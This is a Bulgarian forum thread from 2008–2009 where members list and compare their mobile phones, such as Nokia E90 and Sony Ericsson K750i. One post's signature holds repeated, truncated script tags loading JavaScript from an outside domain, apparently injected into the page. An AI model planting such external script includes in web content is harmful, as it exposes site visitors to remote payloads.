Кой какъв GSM притежава ?Марка и модел
Започната от Avantgarde, 01 дек 2008 - 15:49:54
120 мнения по тази тема
Публикувано 16 януари 2009 - 00:23
Да, беше сравнително нов но ако си спомняш темата от тогава, купих го само защото 95-цата ми умря.
А аз дотолкова не мога без точно този тип телефон, че избора беше друга 9500 на старо или нова Е90.
Е, избрах новата след първото влизане в магазина
Абсолютно подкрепям: Е90 а предполагам и другите Е серии са страхотни машини.
Абсолютно нищо общо с Symbian S80. Аз очевидно дотолкова бях свикнал с бъговете и мудността му, че не ми правеха впечатление.
Е90 просто работи така, както се очаква от него.
Ако се абстрахираме от парите, които съм дал за него би бил едно от най-точните ми попадения
А аз дотолкова не мога без точно този тип телефон, че избора беше друга 9500 на старо или нова Е90.
Е, избрах новата след първото влизане в магазина
Абсолютно подкрепям: Е90 а предполагам и другите Е серии са страхотни машини.
Абсолютно нищо общо с Symbian S80. Аз очевидно дотолкова бях свикнал с бъговете и мудността му, че не ми правеха впечатление.
Е90 просто работи така, както се очаква от него.
Ако се абстрахираме от парите, които съм дал за него би бил едно от най-точните ми попадения
Публикувано 16 януари 2009 - 15:55
в момента съм с 2 лични и 2 служебни - служебните са 2 броя нокиа 2630, една нокиа 5300 и един SE к608и - това е най-коравият телефон, който съм имал, а съм имал 14-15 модела някъде, от всичките масови марки - алкател, ериксон, нокиа, сименс, саджем, моторола.... сега скоро мисля за взема 6500, за мен това е съвършеният телефон
Публикувано 16 януари 2009 - 22:21
От няколко месеца - доволен собственик на SE 910i
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
Публикувано 17 януари 2009 - 00:44
От 17,30 часа днес съм с SE K770
Прикачени файлове
Публикувано 17 януари 2009 - 16:14
Nokia N70,корав телефон,падал е,удрял се е в чугунен радиатор,падал е в кал,здрав е,ама след много падания се бъгва дисплея.
От магазина ми казаха че се разместил и не влиза добре конектора му в платката(нещо такова беше).Бавен бил,като му свикнеш,не е чак толкоз бавен.Искам следващия ми телефон да е Е90,ама нямам пари за него......ще изчакам докато стигне 500 лева,което няма да е скоро
От магазина ми казаха че се разместил и не влиза добре конектора му в платката(нещо такова беше).Бавен бил,като му свикнеш,не е чак толкоз бавен.Искам следващия ми телефон да е Е90,ама нямам пари за него......ще изчакам докато стигне 500 лева,което няма да е скоро
Публикувано 27 януари 2009 - 10:05
Аз си дадох новата Nokia E66 и взех стария Nokia 8800 Sirocco gold на половинката.Нещо не ми стоеше добре в ръката големия Е 66.
Та сега са ми луната и сирокото.
Та сега са ми луната и сирокото.
Публикувано 27 януари 2009 - 23:54
От днес съм с с Нокиа 5800. Много ме кефи.
Публикувано 28 януари 2009 - 18:19
Ми аз съм бил притежател над 60 телефона(ГСМ)-45 са били НОКИЯ-
Към момента имам само 2 телефона(казвам го така защото майка ми има 7-аз и казах ,че е ненормална ама тя само ми се усмихва)
NOKIA N 95 ;SE K750I
Въпреки ,че съм върл фен на нокия-държа да отбележа ,че най вярно и дълго и качествено служилия ми телефон е СЕ К750ката които още имам-купих го чисто нов когато излязоха и го ползвах допреди година като основен телефон
като знам колко пари съм дал за телефони чак ме хваща яд....и всеки ден излиза нещо по хубаво....
Личен съвет от мен-телефоните са компромис и мултифункционално устройство което има много неща в себе си ,но всички са средно или ниско качество-ако искате наистина хубаво обурудване-купете си всички неща по отделно -камера .ГПС,и прочее гъзарий....
Телефоните са ужасни скъпи ,а ние ужасно глупави ,че ги купуваме=аз последната нокия я купих на цена на нормален читав лаптоп....и за кво.....я съм снимал 200 пъти и тва е...ни ДжиПиЕС НИ МЕЙЛИ НИ КАРТИ НИ НИЩО....,,,ама карай де
Батка и аз го разбрах това, след като смених безброй телефони, пък дано ми увре мозъка и с колите уффффффффф.
Ъпдайтче - СЕ W580. Страшен телефон - светка, свири, хммммммммм и телефониране и смси
Добре, че успях да шитна предишния W960i на хубава цена и успях да си купия и един готин фороапарат. Препоръчвам на непретенциозните, които си падат по всичко автоматично, малко, с голям диспей - Сони т300. http://www.dpreview....303sonyt300.asp
Sky каза:Ела да сръбнеш от извора!
" Ау ми врътнеш един Биг Бен ма! Ни моа, боли ме главата!"
" Ау ми врътнеш един Биг Бен ма! Ни моа, боли ме главата!"
Публикувано 31 януари 2009 - 01:53
8800 арте
Мъжете правят пари, не парите правят мъже.
Публикувано 31 януари 2009 - 17:58
8800 арте
Много стилна машинка. BTW обикновенното Arte или карбоновото му превъплъщение?
Публикувано 03 февруари 2009 - 11:26
нокиа 63 00 черен
нокиа 65 00 класик (не авантгард)
нокиа 68 22
62 10 за в колата
нокиа 65 00 класик (не авантгард)
нокиа 68 22
62 10 за в колата
Автоморга-Мерцедес-0876/438-583
www.mercedes.mobile.bg
www.mercedes.mobile.bg
Публикувано 04 февруари 2009 - 02:19
Много стилна машинка. BTW обикновенното Arte или карбоновото му превъплъщение?
Carbon Arte e страхотен като дизайн, но за съжаление батерията му издържа сравнително малко и не е много удобен за работа, също камерата е гадна като качество и е сложена на ниско и като снимам вече няколко пъти снимката е с половината ми пръст.
Публикувано 04 февруари 2009 - 11:07
Моторола - имаше некви букви но не помня .... от цифрите нещо 140 ми се мота в главата.
1 седмица му даржи батерията даже и да говоря по 10 пати на ден - държи по причина че тоя тел няма нищо ..никакви простотии абе телефон си е.
И наи голямата му екстра е че струва 2-3 евро кат нов (10 евро с предпалтена карта ама в картата има 5 до 8 евро разговори) и си го разкодирвам сам за 1-2 минути.
W 124 - 300D
W 124 - 230E
W 124 - 230E
Публикувано 04 февруари 2009 - 11:45
Моторола - имаше некви букви но не помня .... от цифрите нещо 140 ми се мота в главата.
1 седмица му даржи батерията даже и да говоря по 10 пати на ден - държи по причина че тоя тел няма нищо ..никакви простотии абе телефон си е.
И наи голямата му екстра е че струва 2-3 евро кат нов (10 евро с предпалтена карта ама в картата има 5 до 8 евро разговори) и си го разкодирвам сам за 1-2 минути.
Моторола... Френд имаше някаква преди много години и ми е единствения досег с гесеме на тази фирма.
Ми кво да ти кажа...
За да направиш нещо с него, нещо различно от просто набиране, и то ако си спомниш номера беше свързано със сериозен риск да се счупиш някой нокът.
По-лесно беше да се запомнят някакви бинарно/шестнайсетични кодове за да сетнеш нещо по него, отколкото да ползваш меню.
Всъщност дори не съм сигурен, че имаше меню...
И да не си помислиш, че е било през средновековието - другите фирми си имаха менюта в телефоните и всичко ставаше мноооого по-лесно
Оттогава асоциирам моторола с желание за мазохизъм
2 потребител(и) четат тази тема
0 потребители, 2 гости, 0 анонимни